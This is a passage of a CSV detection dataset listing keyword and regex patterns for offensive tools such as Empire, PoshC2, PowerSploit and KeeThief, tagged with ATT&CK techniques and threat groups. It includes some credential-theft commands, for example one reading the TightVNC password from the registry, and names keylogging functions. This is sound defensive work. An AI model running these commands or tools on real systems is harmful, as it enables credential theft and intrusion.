Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-GroupMembers -GroupName ""Enterprise Admins""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Enterprise\sAdmins\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-GroupMembers -GroupName ""Server Operators""*",".{0,1000}Get\-GroupMembers\s\-GroupName\s\""Server\sOperators\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Get-HeadersWithPrtCookies*",".{0,1000}Get\-HeadersWithPrtCookies.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetHijackableDllName*",".{0,1000}GetHijackableDllName.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Get-ImageNtHeaders*",".{0,1000}Get\-ImageNtHeaders.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-implantworkingdirectory*",".{0,1000}get\-implantworkingdirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-InactiveDomainAdmins*",".{0,1000}Get\-InactiveDomainAdmins.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Get-InternetExplorerBookmarks*",".{0,1000}Get\-InternetExplorerBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-InternetExplorerHistory*",".{0,1000}Get\-InternetExplorerHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\Software\\TightVNC\\Server\s\-Name\s.{0,1000}Password.{0,1000}\s\|\sselect\s\-ExpandProperty\sPassword.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 
*RunAsPPL*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\-Name\s.{0,1000}RunAsPPL.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). You can query this with PowerShell as follows.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-KeePassConfigTrigger*",".{0,1000}Get\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*Get-KeePassINIFields*",".{0,1000}Get\-KeePassINIFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeePassXMLFields*",".{0,1000}Get\-KeePassXMLFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeystrokeData*",".{0,1000}Get\-KeystrokeData.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-Keystrokes *",".{0,1000}Get\-Keystrokes\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-keystrokes*",".{0,1000}get\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-Killdate*",".{0,1000}Get\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-killdate*",".{0,1000}get\-killdate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" 
"*Get-KIWI_KERBEROS_LOGON_SESSION*",".{0,1000}Get\-KIWI_KERBEROS_LOGON_SESSION.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*Get-LastLoggedon -*",".{0,1000}Get\-LastLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-LastLoggedOn*",".{0,1000}Get\-LastLoggedOn.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*getLocalAdm*",".{0,1000}getLocalAdm.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Get-LoggedOnLocal -*",".{0,1000}Get\-LoggedOnLocal\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetLoggedOnUsersRegistry.cs*",".{0,1000}GetLoggedOnUsersRegistry\.cs.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","8","8","N/A","N/A","N/A","N/A" "*getLogger(""NemesisConnector"")*",".{0,1000}getLogger\(\""NemesisConnector\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
